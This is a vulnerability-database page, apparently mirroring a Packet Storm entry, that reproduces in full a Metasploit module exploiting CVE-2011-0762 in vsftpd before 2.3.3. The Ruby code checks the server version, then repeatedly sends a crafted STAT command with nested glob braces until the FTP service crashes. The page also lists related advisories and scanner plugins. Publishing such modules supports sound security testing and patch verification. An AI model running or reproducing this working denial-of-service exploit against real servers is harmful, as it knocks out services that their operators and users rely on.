Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

VSFTPD 2.3.2 Denial of Service

🗓️ 31 Aug 2024 00:00:00Reported by Maksymilian Arciemowicz, Nick Cottrell, Anna Graterol, Mana Mostaani, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 381 Views

VSFTPD 2.3.2 Denial of Service in versions before 2.3.3, tested on 2.3.0, 2.3.1, and 2.3.2

Related
Code
ReporterTitlePublishedViews
Family
0day.today		vsftpd 2.3.2 Denial of Service Vulnerability
3 Mar 201100:00
zdt
BDU FSTEC		Vulnerabilities of the Debian GNU/Linux operating system that allow a remote attacker to compromise the accessibility of protected information
28 Apr 201500:00
bdu_fstec
Tenable Nessus		CentOS 4 / 5 : vsftpd (CESA-2011:0337)
11 Mar 201100:00
nessus
Tenable Nessus		Debian DSA-2305-1 : vsftpd - denial of service
20 Sep 201100:00
nessus
Tenable Nessus		Fedora 15 : vsftpd-2.3.4-1.fc15 (2011-2567)
16 Mar 201100:00
nessus
Tenable Nessus		Fedora 14 : vsftpd-2.3.4-1.fc14 (2011-2590)
15 Mar 201100:00
nessus
Tenable Nessus		Fedora 13 : vsftpd-2.3.4-1.fc13 (2011-2615)
15 Mar 201100:00
nessus
Tenable Nessus		GLSA-201110-07 : vsftpd: Denial of Service
12 Oct 201100:00
nessus
Tenable Nessus		Mandriva Linux Security Advisory : vsftpd (MDVSA-2011:049)
22 Mar 201100:00
nessus
Tenable Nessus		MiracleLinux 4 : vsftpd-2.2.2-6.AXS4.1 (AXSA:2011-88:01)
14 Jan 202600:00
nessus
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Ftp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'VSFTPD 2.3.2 Denial of Service',  
'Description' => %q{  
This module triggers a Denial of Service condition in the VSFTPD server in  
versions before 2.3.3. So far, it has been tested on 2.3.0, 2.3.1, and 2.3.2.  
},  
'Author' => [  
'Nick Cottrell (Rad10Logic) <ncottrellweb[at]gmail.com>', # Module Creator  
'Anna Graterol <annagraterol95[at]gmail.com>', # Vuln researcher  
'Mana Mostaani <mana.mostaani[at]gmail.com>',  
'Maksymilian Arciemowicz' # Original EDB PoC  
],  
'License' => MSF_LICENSE,  
'References' => [  
[ 'BID', '46617' ],  
[ 'CVE', '2011-0762' ],  
[ 'EDB', '16270' ]  
],  
'DisclosureDate' => '2011-02-03',  
'Notes' => {  
'Stability' => [CRASH_SERVICE_DOWN],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => []  
}  
)  
)  
end  
  
def check  
# attempt to connect  
begin  
if !connect_login  
print_error('Connection refused.')  
return Exploit::CheckCode::Unknown  
end  
rescue Rex::ConnectionRefused  
print_error('Connection refused.')  
return Exploit::CheckCode::Unknown  
rescue Rex::ConnectionTimeout  
print_error('Connection timed out')  
return Exploit::CheckCode::Unknown  
end  
s = ''  
loop do  
# get each line until our desired line shows or end line shows  
s = send_cmd(['STAT'], true)  
break if (s =~ /vsFTPd \d+\.\d+\.\d+/) || (s == "211 End of status\r\n")  
end  
disconnect  
# check if version was found  
if s !~ /vsFTPd \d+\.\d+\.\d+/  
print_error('Did not find ftp version in FTP session.')  
return Exploit::CheckCode::Unknown  
end  
  
# pull out version and check if its in range of vulnerability  
version = s[/\d+\.\d+\.\d+/]  
if Rex::Version.new(version) < Rex::Version.new('2.3.3')  
Exploit::CheckCode::Appears  
else  
Exploit::CheckCode::Safe  
end  
end  
  
def run  
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if check != Exploit::CheckCode::Appears  
  
payload = 'STAT ' + '{{*},' * 487 + '{.}' + '}' * 487  
  
vprint_status("Payload being sent: #{payload}")  
print_status('sending payload')  
  
loop do  
print('.')  
connect_login  
10.times do  
send_cmd([payload.to_s], false)  
end  
send_cmd([payload.to_s], true)  
disconnect  
rescue Rex::ConnectionTimeout  
print("\n")  
print_error('Connection timeout! Sending again')  
rescue Errno::ECONNRESET  
print("\n")  
print_error('Connection reset!')  
rescue Rex::ConnectionRefused  
print("\n")  
print_good('Connection refused! Appears DOS attack succeeded.')  
rescue EOFError  
print("\n")  
print_good('Stream was cut off abruptly. Appears DOS attack succeeded.')  
break  
end  
disconnect  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2024 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 24
EPSS0.23946
vsftpddenial of serviceexploit
381